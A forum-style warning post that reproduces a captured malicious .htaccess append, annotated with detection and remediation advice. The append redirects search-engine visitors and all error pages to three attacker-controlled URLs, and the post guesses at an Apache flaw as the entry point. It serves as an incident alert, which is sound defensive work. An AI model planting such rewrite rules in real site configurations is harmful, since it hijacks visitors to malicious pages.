Heads up on a server attack
http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/
This appears to be gaining ground.
The attacker manages to append several lines to .htaccess, as shown below.
This is a file that appears to have been modified three times.
Code:
# Captured sample of a malicious .htaccess append (left byte-for-byte as found;
# the directives and URLs below are the indicator, not something to deploy).
# What it does: for visitors whose Referer header contains one of the substrings
# listed below, every request on the site is externally redirected to an
# attacker-controlled URL; the ErrorDocument lines send clients to the same URL
# for the listed HTTP error statuses.
# Detection: search every .htaccess on the host for RewriteCond lines on
# %{HTTP_REFERER} followed by a RewriteRule or ErrorDocument whose target is an
# absolute http:// URL on a foreign domain.
# Remediation: restore .htaccess from a known-good copy. Nothing in this file
# shows HOW it was written; whether that was stolen FTP/hosting credentials or a
# writable web application has to be established from the server's own logs.
RewriteEngine on
# Each RewriteCond is a bare substring test (unescaped dots, leading/trailing .*),
# chained with [OR]: the rule fires if ANY token appears anywhere in the Referer.
# ".*search.*" matches far more than search engines. A request with no Referer
# (address typed directly, bookmark) matches nothing and is served normally,
# which is presumably why the site owner does not notice the redirect.
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
# ".*" matches every request path; [R] makes it an external redirect to the
# foreign URL and [L] stops further rewrite processing for the request.
RewriteRule .* http://ahmetekremkaya.com/wp-content/themes/my/z.php [R,L]
# ErrorDocument with an absolute URL makes Apache redirect the client to that
# URL instead of serving a local error page, so broken links and forbidden
# paths also lead off-site (no Referer check applies here).
ErrorDocument 400 http://ahmetekremkaya.com/wp-content/themes/my/z.php
ErrorDocument 401 http://ahmetekremkaya.com/wp-content/themes/my/z.php
ErrorDocument 403 http://ahmetekremkaya.com/wp-content/themes/my/z.php
ErrorDocument 404 http://ahmetekremkaya.com/wp-content/themes/my/z.php
ErrorDocument 500 http://ahmetekremkaya.com/wp-content/themes/my/z.php
# Second append: the identical condition set, pointing at a different domain.
# Because the first RewriteRule above carries [L] and the conditions are the
# same, this RewriteRule is presumably never reached; the ErrorDocument lines,
# however, override the earlier ones (last definition wins).
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://experience7.ca/fr/images/tr.php [R,L]
ErrorDocument 400 http://experience7.ca/fr/images/tr.php
ErrorDocument 401 http://experience7.ca/fr/images/tr.php
ErrorDocument 403 http://experience7.ca/fr/images/tr.php
ErrorDocument 404 http://experience7.ca/fr/images/tr.php
ErrorDocument 500 http://experience7.ca/fr/images/tr.php
# Third append, same pattern again with a third domain. All three destination
# hosts are indicators worth checking in outbound proxy/DNS logs; the
# ErrorDocument targets below are the ones actually in effect for this file.
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://ecmcorpusa.com/t/tr.php [R,L]
ErrorDocument 400 http://ecmcorpusa.com/t/tr.php
ErrorDocument 401 http://ecmcorpusa.com/t/tr.php
ErrorDocument 403 http://ecmcorpusa.com/t/tr.php
ErrorDocument 404 http://ecmcorpusa.com/t/tr.php
ErrorDocument 500 http://ecmcorpusa.com/t/tr.php
It seems to be exploiting some Apache vulnerability that allows text files to be written to. We have found these on three different sites in the past week.